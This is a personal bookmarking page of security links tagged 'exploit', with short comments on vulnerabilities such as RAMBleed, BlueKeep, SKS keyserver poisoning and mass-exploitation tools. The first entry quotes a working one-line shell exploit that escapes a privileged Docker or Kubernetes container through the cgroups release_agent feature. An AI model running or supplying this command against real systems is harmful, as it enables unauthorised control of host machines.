asteroza + exploit   221

Felix Wilhelm on Twitter: "Quick and dirty way to get out of a privileged k8s pod or docker container by using cgroups release_agent feature"
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
kubernetes  docker  container  breakout  exploit  security  hacking  pentesting 
12 weeks ago by asteroza
SKS Keyserver Network Under Attack
Uh, the GPG aspect means a risk of supply chain attack for all linux distros using GPG armoring on their package management/deployment architectures. Which is NOT GOOD. Also, Tor Browser Developer cert is now poisoned, so the supply chain attack has started...
PGP  OpenPGP  GnuPG  GPG  keyserver  network  spam  attack  poison  certificate  poisoning  DoS  security  exploit  hacking  pentesting 
july 2019 by asteroza
RAMBleed
rowhammer is back with a vengence...
DRAM  RAM  ECC  memory  attack  exploit  rowhammer  security  hacking  pentesting 
june 2019 by asteroza
Prevent a worm by updating Remote Desktop Services (CVE-2019-0708) – MSRC
Probable wormable RDP exploit, preauth RCE. They are publishing XP patches, so this is pretty bad.
microsoft  windows  patch  XP  2003  RDP  exploit  sysadmin  tips  tricks 
may 2019 by asteroza
Faxsploit – Exploiting A Fax With A Picture | Hackaday
Sure this is about an all-in-one fax/printer rigs, but don't forget a lot of companies now also use fax to email gateways as well...
fax  exploit  OOB  attack  security  hacking  pentesting 
may 2019 by asteroza
649/Crashcast-Exploit: This tool allows you mass play any YouTube video with Chromecasts obtained from Shodan.io
Oh the unholy hell you could unleash with this. Naturally, there is a certain rickroll default if no particular video is selected...
chromecast  UPNP  exploit  rickroll  security  hacking  pentesting 
january 2019 by asteroza
[1901.01161] Page Cache Attacks
This is kinda bad, since it leverages software caches and can be hardware agnostic, allowing write once malware that works well all over (javascript?)
shadow  page  cache  side  channel  attack  exploit  security  hacking  pentesting 
january 2019 by asteroza
ECCploit: ECC Memory Vulnerable to Rowhammer Attacks After All - VUSec
DD3, but they think the same timing sidechannel is present in DDR4...
rowhammer  attack  exploit  timing  side  channel  DDR3  ECC 
november 2018 by asteroza
docker breakout
nice little container breakout with persistence implanting
docker  root  exploit  privilege  escalation  security  hacking  pentesting 
september 2018 by asteroza
Security | DMA | Hacking: Total Meltdown?
So we heard you've got meltdown, so we put meltdown in your meltdown...
PCILeech  DMA  windows  7  meltdown  exploit  privileged  memory  access  security  hacking  pentesting 
april 2018 by asteroza
ChipWhisperer® – NewAE Technology Inc.
Hardware hacking, using stuff now available on Mouser. Which means hardware attacks are now consumer grade, no nation state needed...
hacking  hardware  electronics  devices  chip  debug  reverse  engineering  security  pentesting  attack  exploit  firmware  analysis 
march 2018 by asteroza
NullArray/AutoSploit: Automated Mass Exploiter
Yanks target IP's from shodan then runs some metasploit packages. Like metasploit's old autopwn, but internet scale searching for low hanging fruit. Some skiddie is gonna get arrested for this...
automated  exploit  shodan  metasploit  security  hacking  pentesting  opensource  software  automation 
february 2018 by asteroza
Intel® Management Engine Critical Firmware Update (Intel SA-00086)
Security Advisory (Intel-SA-00086), a critical firmware vulnerability in systems. AKA the DOOM ME HOLE detection tool. Also , only detects, still need a separate ME firmware patch from your motherboard manufacturer...
linux  windows  intel  management  engine  ME  firmware  exploit  vulnerability  hole  detection  sysadmin  tools  utilities  software  security  version  check  test  checker  tester 
november 2017 by asteroza
« earlier      
per page:    204080120160

related tags

0-day  0day  8.1  802.11  2012R2  abuse  access  accesspoint  acrobat  action  active  ActiveX  AD  ADB  addon  address  admin  adversarial  aggregator  airgap  algorithm  ALPC  alternative  analog  analysis  android  anonymity  anonymous  ANSI  antivirus  AP  apache  app  AppLocker  architecture  archive  ARM  ASLR  assembly  assessment  ATK  attack  audit  auditing  automated  automation  autorun  backdoor  backtrack  base64  bash  BashBunny  batch  binary  block  bloodhound  blowfish  BlueBorne  BLUEKEEP  bluetooth  book  boundary  bounty  breakout  broadcom  browser  brute  bug  bypass  C3  cable  cache  CAF  canvas  capstone  capture  CD  certificate  certutil  chain  champion  channel  cheatsheet  check  checker  chip  chrome  chromecast  classic  cnada  code  coded  coherence  collection  COM  command  commands  common  composite  computer  conference  constrained  consumer  container  cookie  CPE  CPU  crack  cracking  creation  crosscompile  cross_fuzz  cryptography  CSS  CTF  custom  CVE  daemon  damn  DanderSpritz  data  database  day  DDoS  DDR3  debug  debugging  deep  defeat  defense  Delicious  delivery  demo  deploy  deployment  DES  deserialization  detection  development  device  devices  DFIR  diffie-hellman  directory  dirtyCOW  disclosure  distribution  DLL  DMA  DNS  docker  DOM  DoS  DOUBLEPULSAR  downgrade  download  DRAM  driver  drivers  DSL  DVL  EAP  eb  ECC  education  eEye  electrical  electroncis  electronics  email  embedded  EMET  encode  encoding  encryption  engine  engineering  english  entity  enumeration  environment  equities  escalation  eternal  EternalBlue  EternalChampion  EternalRomance  EternalSynergy  ETW  event  evil  evilgrade  exchange  execution  exfiltration  EXPLODINGCAN  exploit  exploitation  exploits  extension  extraction  face  FAIL  fake  FakeAP  false  fax  faxploit  file  filetype:jpg  filetype:pdf  firewall  firmware  flowchart  force  forensics  forest  foreverday  format  framework  full  function  Fuzzbunch  fuzzer  fuzzing  gateway  generator  generic  glasses  GnuPG  golden  google  GPG  GPO  group  gruyere  guide  guyide  hack  hacking  hackinig  handling  hard  hardware  hash  header  heap  HID  hijacking  hole  hook  hooking  hostapd  hostname  howto  HSM  HTA  HTML  HTTP  HTTPS  humor  ICC  IDS  IIS  image  immunity  immutable  Infineon  information  infosec  injection  install  installutil  intel  IoT  IPC  iPhone  IPS  ISO  ISR-evilgrade  iTunes  java  javascipt  javascript  jenkins  JPEG  JSON  kali  KARMA  kerberos  kernel  key  keygen  keylogger  keyserver  killchain  Kit  kubernetes  lab  language  lateral  layered  learning  legacy  length  library  line  LinkScanner  linux  list  LiveCD  liveCD  loader  local  log  LOLbin  lookup  mac  machine  macro  mailsploit  malicious  malware  MANA  management  market  marketplace  mathematics  ME  media:document  media:image  mediator  meltdown  memory  messenger  metasploit  meterpreter  methodology  methods  microsoft  mimikatz  MIPS  mitigation  MitM  mitnick  mobile  modification  module  moduli  mongoDB  monitoring  mount  movement  MSbuild.exe  MTA  name  natural  negative  NetBIOS  network  networking  news  nmap  NSA  obfuscation  object  office  office365  online  OOB  OpenBSD  OpenPGP  opensource  OSX  overlay  OWASP  page  party  password  patch  path  payload  PCI  PCILeech  PDF  penetration  pentest  pentesting  penteting  persistence  PGP  phishing  picture  PKCS#11  PKCS11  plugin  PoC  podslurping  poison  poisoning  policy  polygot  polymorphic  polymorphism  port  portal  powerpoint  powershell  PowerView  powshell  practice  printer  privacy  priviledge  privilege  privileged  profile  programming  proof-of-concept  protection  protocol  proxy  python  radare2  RAM  raspberrypi  RAT  RCE  RDP  rebinding  recognition  recon  redirection  redteam  reference  regasm  regsvcs  regsvr32  reinstallation  relay  release  remote  reporting  repository  request  research  resolution  responder  retrieval  retro  reverse  RF  RFC  RFC-1342  RFC1342  rickroll  ring  risk  root  ROP  rowhammer  RPC  RSA  ruby  rundll32  safari  SafeNet  sales  sample  SCADA  scan  scanner  scanning  script  SCT  search  security  seed  sender  serialization  server  service  session  SGX  shadow  shared  sharepoint  shell  shellcode  shellshock  shodan  shopping  side  SMB  SMBv1  SNMP  social  software  source  spam  spectre  speculative  SPN  spoof  spoofing  spyware  squiblydoo  SSL  steganography  string  subscription  sync  sysadmin  TakeDOwnCon  teams  technique  telnet  telnetd  TEMPEST  test  tester  testing  theft  threat  thrid  thunderbolt  ticket  timing  tips  TLS  tomcat  Tool  toolkit  tools  towelroot  TPM  tracing  tracker  traingin  training  transparent  tricks  trojan  trust  trusted  trustjacking  tutorial  U3  UAC  update  UPNP  USaBUSe  usage  USB  utilities  variable  vector  version  VIA  virus  VMware  VPN  VPNfilter  vulnerabilities  vulnerability  vulnerabilty  vulnerable  VUPEN  WAR  weak  web  webapp  webDAV  webdev  webkit  weblogic  website  websphere  WEP  whitebox  whitelist  wifi  win10pcap  windows  winpcap  WINS  wireless  wordpress  WPA2  WPA3  WPAD  X9.31  X11  x86  XML  Xorg  XP  XSS  zergrush  zero  zero-day  zeroday  zip 

Copy this bookmark:



description:


tags: